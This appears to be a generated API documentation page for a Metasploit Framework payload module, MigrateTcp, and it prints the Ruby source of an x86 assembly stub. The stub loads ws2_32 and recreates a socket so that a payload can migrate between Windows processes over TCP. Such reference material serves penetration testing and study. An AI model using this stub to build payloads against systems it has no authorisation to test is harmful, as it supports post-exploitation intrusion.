Module: Msf::Payload::Windows::MigrateTcp

Includes:
MigrateCommon
Defined in:
lib/msf/core/payload/windows/migrate_tcp.rb

Overview

Payload that supports migration over the TCP transport on x86.

Constant Summary collapse

WSA_VERSION =
0x190

Instance Method Summary collapse

Methods included from MigrateCommon

#generate

Methods included from BlockApi

#asm_block_api

Methods included from Msf::Payload::Windows

#apply_prepends, exit_types, #handle_intermediate_stage, #include_send_uuid, #replace_var

Methods included from PrependMigrate

#apply_prepend_migrate, #prepend_migrate, #prepend_migrate?, #prepend_migrate_64

Instance Method Details

#generate_migrate(opts = {}) ⇒ Object

Constructs the migrate stub on the fly



31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
# File 'lib/msf/core/payload/windows/migrate_tcp.rb', line 31

def generate_migrate(opts={})
  %Q^
  load_ws2_32:
    push '32'
    push 'ws2_'
    push esp                  ; pointer to 'ws2_32'
    push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
    call ebp                  ; LoadLibraryA('ws2_32')
  init_networking:
    mov eax, #{WSA_VERSION}   ; EAX == version, and is also used for size
    sub esp, eax              ; allocate space for the WSAData structure
    push esp                  ; Pointer to the WSAData structure
    push eax                  ; Version required
    push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
    call ebp                  ; WSAStartup(Version, &WSAData)
  create_socket:
    push eax                  ; eax is 0 on success, use it for flags
    push eax                  ; reserved
    lea ebx, [esi+0x10]       ; get offset to the WSAPROTOCOL_INFO struct
    push ebx                  ; pass the info struct address
    push eax                  ; no protocol is specified
    inc eax
    push eax                  ; SOCK_STREAM
    inc eax
    push eax                  ; AF_INET
    push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
    call ebp                  ; WSASocketA(AF_INET, SOCK_STREAM, 0, &info, 0, 0)
    xchg edi, eax
  ^
end

#initialize(info = {}) ⇒ Object



17
18
19
20
21
22
23
24
25
26
# File 'lib/msf/core/payload/windows/migrate_tcp.rb', line 17

def initialize(info={})
  super(update_info(info,
    'Name'        => 'TCP Transport Migration (x86)',
    'Description' => 'Migration stub to use over the TCP transport via x86',
    'Author'      => ['OJ Reeves'],
    'License'     => MSF_LICENSE,
    'Platform'    => 'win',
    'Arch'        => ARCH_X86
  ))
end